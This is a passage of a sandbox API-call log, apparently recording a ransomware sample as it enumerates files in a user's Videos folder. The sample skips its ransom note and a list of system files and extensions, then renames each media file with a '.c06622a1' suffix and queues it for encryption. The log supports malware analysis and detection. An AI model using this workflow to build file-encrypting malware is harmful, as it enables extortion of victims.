HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.511] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned 0x4b [0156.511] wcscpy (in: _Dest=0x4560158, _Source="b7bwTMmAmGg_Pf.avi" | out: _Dest="b7bwTMmAmGg_Pf.avi") returned="b7bwTMmAmGg_Pf.avi" [0156.511] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi", dwFileAttributes=0x80) returned 1 [0156.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\b7bwtmmamgg_pf.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0156.511] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.511] ReadFile (in: hFile=0x66c, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.512] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0xdac2e2b9 [0156.512] RtlComputeCrc32 (PartialCrc=0xe2b9, Buffer=0x3fe3f4, Length=0x80) returned 0xa6577761 [0156.512] RtlComputeCrc32 (PartialCrc=0x7761, Buffer=0x3fe3f4, Length=0x80) returned 0x1dae093a [0156.512] RtlComputeCrc32 (PartialCrc=0x93a, Buffer=0x3fe3f4, Length=0x80) returned 0xb6c0c4ee [0156.512] RtlComputeCrc32 (PartialCrc=0xc4ee, Buffer=0x3fe3f4, Length=0x80) returned 0x7a67f8af [0156.512] CloseHandle (hObject=0x66c) returned 1 [0156.512] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.512] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi" [0156.512] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi") returned 0x5e [0156.512] wcscpy (in: _Dest=0x4570184, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.512] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\b7bwtmmamgg_pf.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\b7bwtmmamgg_pf.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\b7bwTMmAmGg_Pf.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\b7bwtmmamgg_pf.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0156.514] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.514] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0156.519] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71645ee8 [0156.519] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x222a9543 [0156.520] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a273221 [0156.520] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74a67330 [0156.520] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ea88369 [0156.520] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b31125d [0156.520] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f8f5049 [0156.520] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x44b99c41 [0156.523] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x4c5652c8 [0156.523] RtlComputeCrc32 (PartialCrc=0x52c8, Buffer=0x2f30094, Length=0x80) returned 0x6d6c2629 [0156.523] RtlComputeCrc32 (PartialCrc=0x2629, Buffer=0x2f30094, Length=0x80) returned 0x2d2fa1a7 [0156.523] RtlComputeCrc32 (PartialCrc=0xa1a7, Buffer=0x2f30094, Length=0x80) returned 0xc294af8b [0156.523] RtlComputeCrc32 (PartialCrc=0xaf8b, Buffer=0x2f30094, Length=0x80) returned 0x632ff853 [0156.523] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.523] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.523] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.523] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54fd6010, ftCreationTime.dwHighDateTime=0x1d5dccf, ftLastAccessTime.dwLowDateTime=0x3a1a64b0, ftLastAccessTime.dwHighDateTime=0x1d5e3bd, ftLastWriteTime.dwLowDateTime=0x3a1a64b0, ftLastWriteTime.dwHighDateTime=0x1d5e3bd, nFileSizeHigh=0x0, nFileSizeLow=0x684d, dwReserved0=0x0, dwReserved1=0x0, cFileName="G0zk7IbCrQjSGHoa.mkv", cAlternateFileName="G0ZK7I~1.MKV")) returned 1 [0156.523] _wcsicmp (_Str1="G0zk7IbCrQjSGHoa.mkv", _Str2="README.c06622a1.TXT") returned -11 [0156.523] wcsstr (_Str="G0zk7IbCrQjSGHoa.mkv", _SubStr="README") returned 0x0 [0156.523] _wcsicmp (_Str1="autorun.inf", _Str2="G0zk7IbCrQjSGHoa.mkv") returned -6 [0156.523] wcslen (_String="autorun.inf") returned 0xb [0156.523] _wcsicmp (_Str1="boot.ini", _Str2="G0zk7IbCrQjSGHoa.mkv") returned -5 [0156.523] wcslen (_String="boot.ini") returned 0x8 [0156.523] _wcsicmp (_Str1="bootfont.bin", _Str2="G0zk7IbCrQjSGHoa.mkv") returned -5 [0156.523] wcslen (_String="bootfont.bin") returned 0xc [0156.523] _wcsicmp (_Str1="bootsect.bak", _Str2="G0zk7IbCrQjSGHoa.mkv") returned -5 [0156.523] wcslen (_String="bootsect.bak") returned 0xc [0156.523] _wcsicmp (_Str1="desktop.ini", _Str2="G0zk7IbCrQjSGHoa.mkv") returned -3 [0156.523] wcslen (_String="desktop.ini") returned 0xb [0156.523] _wcsicmp (_Str1="iconcache.db", _Str2="G0zk7IbCrQjSGHoa.mkv") returned 2 [0156.523] wcslen (_String="iconcache.db") returned 0xc [0156.523] _wcsicmp (_Str1="ntldr", _Str2="G0zk7IbCrQjSGHoa.mkv") returned 7 [0156.523] wcslen (_String="ntldr") returned 0x5 [0156.523] _wcsicmp (_Str1="ntuser.dat", _Str2="G0zk7IbCrQjSGHoa.mkv") returned 7 [0156.523] wcslen (_String="ntuser.dat") returned 0xa [0156.523] _wcsicmp (_Str1="ntuser.dat.log", _Str2="G0zk7IbCrQjSGHoa.mkv") returned 7 [0156.523] wcslen (_String="ntuser.dat.log") returned 0xe [0156.524] _wcsicmp (_Str1="ntuser.ini", _Str2="G0zk7IbCrQjSGHoa.mkv") returned 7 [0156.524] wcslen (_String="ntuser.ini") returned 0xa [0156.524] _wcsicmp (_Str1="thumbs.db", _Str2="G0zk7IbCrQjSGHoa.mkv") returned 13 [0156.524] wcslen (_String="thumbs.db") returned 0x9 [0156.524] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.524] wcslen (_String="386") returned 0x3 [0156.524] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.524] wcslen (_String="adv") returned 0x3 [0156.524] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.524] wcslen (_String="ani") returned 0x3 [0156.524] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.524] wcslen (_String="bat") returned 0x3 [0156.524] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.524] wcslen (_String="bin") returned 0x3 [0156.524] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.524] wcslen (_String="cab") returned 0x3 [0156.524] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.524] wcslen (_String="cmd") returned 0x3 [0156.524] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.524] wcslen (_String="com") returned 0x3 [0156.524] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.524] wcslen (_String="cpl") returned 0x3 [0156.524] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.524] wcslen (_String="cur") returned 0x3 [0156.524] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.524] wcslen (_String="deskthemepack") returned 0xd [0156.524] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.524] wcslen (_String="diagcab") returned 0x7 [0156.524] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.524] wcslen (_String="diagcfg") returned 0x7 [0156.524] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.524] wcslen (_String="diagpkg") returned 0x7 [0156.524] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.524] wcslen (_String="dll") returned 0x3 [0156.524] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.524] wcslen (_String="drv") returned 0x3 [0156.524] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.524] wcslen (_String="exe") returned 0x3 [0156.524] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.525] wcslen (_String="hlp") returned 0x3 [0156.525] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.525] wcslen (_String="icl") returned 0x3 [0156.525] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.525] wcslen (_String="icns") returned 0x4 [0156.525] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.525] wcslen (_String="ico") returned 0x3 [0156.525] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.525] wcslen (_String="ics") returned 0x3 [0156.525] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.525] wcslen (_String="idx") returned 0x3 [0156.525] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.525] wcslen (_String="ldf") returned 0x3 [0156.525] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.525] wcslen (_String="lnk") returned 0x3 [0156.525] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.525] wcslen (_String="mod") returned 0x3 [0156.525] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.525] wcslen (_String="mpa") returned 0x3 [0156.525] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.525] wcslen (_String="msc") returned 0x3 [0156.525] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.525] wcslen (_String="msp") returned 0x3 [0156.525] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.525] wcslen (_String="msstyles") returned 0x8 [0156.525] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.525] wcslen (_String="msu") returned 0x3 [0156.525] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.525] wcslen (_String="nls") returned 0x3 [0156.525] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.525] wcslen (_String="nomedia") returned 0x7 [0156.525] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.525] wcslen (_String="ocx") returned 0x3 [0156.525] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.525] wcslen (_String="prf") returned 0x3 [0156.525] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.525] wcslen (_String="ps1") returned 0x3 [0156.525] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.525] wcslen (_String="rom") returned 0x3 [0156.526] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.526] wcslen (_String="rtp") returned 0x3 [0156.526] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.526] wcslen (_String="scr") returned 0x3 [0156.526] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.526] wcslen (_String="shs") returned 0x3 [0156.526] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.526] wcslen (_String="spl") returned 0x3 [0156.526] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.526] wcslen (_String="sys") returned 0x3 [0156.526] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.526] wcslen (_String="theme") returned 0x5 [0156.526] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.526] wcslen (_String="themepack") returned 0x9 [0156.526] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.526] wcslen (_String="wpx") returned 0x3 [0156.526] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.526] wcslen (_String="lock") returned 0x4 [0156.526] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.526] wcslen (_String="key") returned 0x3 [0156.526] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.526] wcslen (_String="hta") returned 0x3 [0156.526] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.526] wcslen (_String="msi") returned 0x3 [0156.526] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.526] wcslen (_String="pdb") returned 0x3 [0156.526] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.526] wcslen (_String="sql") returned 0x3 [0156.526] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.526] wcslen (_String="sqlite") returned 0x6 [0156.526] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x")) returned 0x10 [0156.526] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.526] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X" [0156.526] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X") returned 0x4b [0156.527] wcscpy (in: _Dest=0x4560158, _Source="G0zk7IbCrQjSGHoa.mkv" | out: _Dest="G0zk7IbCrQjSGHoa.mkv") returned="G0zk7IbCrQjSGHoa.mkv" [0156.527] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv", dwFileAttributes=0x80) returned 1 [0156.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\g0zk7ibcrqjsghoa.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0156.527] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.527] ReadFile (in: hFile=0x610, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.528] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0xdf1de6e2 [0156.528] RtlComputeCrc32 (PartialCrc=0xe6e2, Buffer=0x3fe3f4, Length=0x80) returned 0xbf2d8ec7 [0156.528] RtlComputeCrc32 (PartialCrc=0x8ec7, Buffer=0x3fe3f4, Length=0x80) returned 0x451fd0f2 [0156.528] RtlComputeCrc32 (PartialCrc=0xd0f2, Buffer=0x3fe3f4, Length=0x80) returned 0xc1eee59e [0156.528] RtlComputeCrc32 (PartialCrc=0xe59e, Buffer=0x3fe3f4, Length=0x80) returned 0xd4f760df [0156.528] CloseHandle (hObject=0x610) returned 1 [0156.528] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.528] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv" [0156.528] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv") returned 0x60 [0156.528] wcscpy (in: _Dest=0x4570188, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.528] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\g0zk7ibcrqjsghoa.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\g0zk7ibcrqjsghoa.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\QLTL2-0X\\G0zk7IbCrQjSGHoa.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\qltl2-0x\\g0zk7ibcrqjsghoa.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0156.532] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.532] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d04d1fd [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x700d618e [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77fe7a68 [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50ef7ccf [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4c4be653 [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x40a16b5d [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7161a1a2 [0156.538] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x262b112 [0156.541] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xe32f9db0 [0156.541] RtlComputeCrc32 (PartialCrc=0x9db0, Buffer=0x41f0094, Length=0x80) returned 0xe86fad1d [0156.541] RtlComputeCrc32 (PartialCrc=0xad1d, Buffer=0x41f0094, Length=0x80) returned 0x55bc2322 [0156.541] RtlComputeCrc32 (PartialCrc=0x2322, Buffer=0x41f0094, Length=0x80) returned 0xaa7f2ff2 [0156.541] RtlComputeCrc32 (PartialCrc=0x2ff2, Buffer=0x41f0094, Length=0x80) returned 0xdb237e2d [0156.541] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0156.541] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.541] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.541] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa66e5f70, ftCreationTime.dwHighDateTime=0x1d5dc85, ftLastAccessTime.dwLowDateTime=0xf24d1cf0, ftLastAccessTime.dwHighDateTime=0x1d5dd80, ftLastWriteTime.dwLowDateTime=0xf24d1cf0, ftLastWriteTime.dwHighDateTime=0x1d5dd80, nFileSizeHigh=0x0, nFileSizeLow=0x17587, dwReserved0=0x0, dwReserved1=0x0, cFileName="GP1tjsXSUsoxTDW.mkv", cAlternateFileName="GP1TJS~1.MKV")) returned 1 [0156.541] _wcsicmp (_Str1="GP1tjsXSUsoxTDW.mkv", _Str2="README.c06622a1.TXT") returned -11 [0156.541] wcsstr (_Str="GP1tjsXSUsoxTDW.mkv", _SubStr="README") returned 0x0 [0156.541] _wcsicmp (_Str1="autorun.inf", _Str2="GP1tjsXSUsoxTDW.mkv") returned -6 [0156.541] wcslen (_String="autorun.inf") returned 0xb [0156.541] _wcsicmp (_Str1="boot.ini", _Str2="GP1tjsXSUsoxTDW.mkv") returned -5 [0156.541] wcslen (_String="boot.ini") returned 0x8 [0156.541] _wcsicmp (_Str1="bootfont.bin", _Str2="GP1tjsXSUsoxTDW.mkv") returned -5 [0156.541] wcslen (_String="bootfont.bin") returned 0xc [0156.541] _wcsicmp (_Str1="bootsect.bak", _Str2="GP1tjsXSUsoxTDW.mkv") returned -5 [0156.541] wcslen (_String="bootsect.bak") returned 0xc [0156.541] _wcsicmp (_Str1="desktop.ini", _Str2="GP1tjsXSUsoxTDW.mkv") returned -3 [0156.541] wcslen (_String="desktop.ini") returned 0xb [0156.541] _wcsicmp (_Str1="iconcache.db", _Str2="GP1tjsXSUsoxTDW.mkv") returned 2 [0156.541] wcslen (_String="iconcache.db") returned 0xc [0156.541] _wcsicmp (_Str1="ntldr", _Str2="GP1tjsXSUsoxTDW.mkv") returned 7 [0156.542] wcslen (_String="ntldr") returned 0x5 [0156.542] _wcsicmp (_Str1="ntuser.dat", _Str2="GP1tjsXSUsoxTDW.mkv") returned 7 [0156.542] wcslen (_String="ntuser.dat") returned 0xa [0156.542] _wcsicmp (_Str1="ntuser.dat.log", _Str2="GP1tjsXSUsoxTDW.mkv") returned 7 [0156.542] wcslen (_String="ntuser.dat.log") returned 0xe [0156.542] _wcsicmp (_Str1="ntuser.ini", _Str2="GP1tjsXSUsoxTDW.mkv") returned 7 [0156.542] wcslen (_String="ntuser.ini") returned 0xa [0156.542] _wcsicmp (_Str1="thumbs.db", _Str2="GP1tjsXSUsoxTDW.mkv") returned 13 [0156.542] wcslen (_String="thumbs.db") returned 0x9 [0156.542] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.542] wcslen (_String="386") returned 0x3 [0156.542] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.542] wcslen (_String="adv") returned 0x3 [0156.542] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.542] wcslen (_String="ani") returned 0x3 [0156.542] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.542] wcslen (_String="bat") returned 0x3 [0156.542] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.542] wcslen (_String="bin") returned 0x3 [0156.542] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.542] wcslen (_String="cab") returned 0x3 [0156.542] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.542] wcslen (_String="cmd") returned 0x3 [0156.542] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.542] wcslen (_String="com") returned 0x3 [0156.542] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.542] wcslen (_String="cpl") returned 0x3 [0156.542] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.542] wcslen (_String="cur") returned 0x3 [0156.542] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.542] wcslen (_String="deskthemepack") returned 0xd [0156.542] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.542] wcslen (_String="diagcab") returned 0x7 [0156.542] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.542] wcslen (_String="diagcfg") returned 0x7 [0156.542] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.542] wcslen (_String="diagpkg") returned 0x7 [0156.542] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.543] wcslen (_String="dll") returned 0x3 [0156.543] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.543] wcslen (_String="drv") returned 0x3 [0156.543] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.543] wcslen (_String="exe") returned 0x3 [0156.543] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.543] wcslen (_String="hlp") returned 